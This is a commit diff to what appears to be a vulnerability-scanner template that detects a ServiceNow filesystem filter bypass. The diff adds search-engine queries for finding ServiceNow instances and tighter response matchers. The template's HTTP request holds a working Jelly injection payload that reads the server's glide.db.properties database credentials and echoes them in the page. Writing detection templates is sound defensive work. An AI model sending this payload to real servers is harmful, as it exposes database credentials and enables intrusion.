minor-update

patch-5
Dhiyaneshwaran 2024-07-11 12:43:50 +05:30 committed by GitHub
parent dfdc32e3a1
commit 20cb50d9f3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 29 additions and 3 deletions

View File

@ -4,11 +4,28 @@ info:
name: Service Now - Filesystem Filter Bypass
author: DhiyaneshDk
severity: high
reference:
- https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
classification:
cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: servicenow
product: servicenow
shodan-query:
- http.favicon.hash:1701804003
- http.title:"servicenow"
fofa-query:
- icon_hash=1701804003
- title="servicenow"
google-query: intitle:"servicenow"
tags: cve,cve2024,servicenow,rce
http:
- raw:
- |
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -16,4 +33,13 @@ http:
- type: word
part: body
words:
- 'db.user'
- "glide.db.user"
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200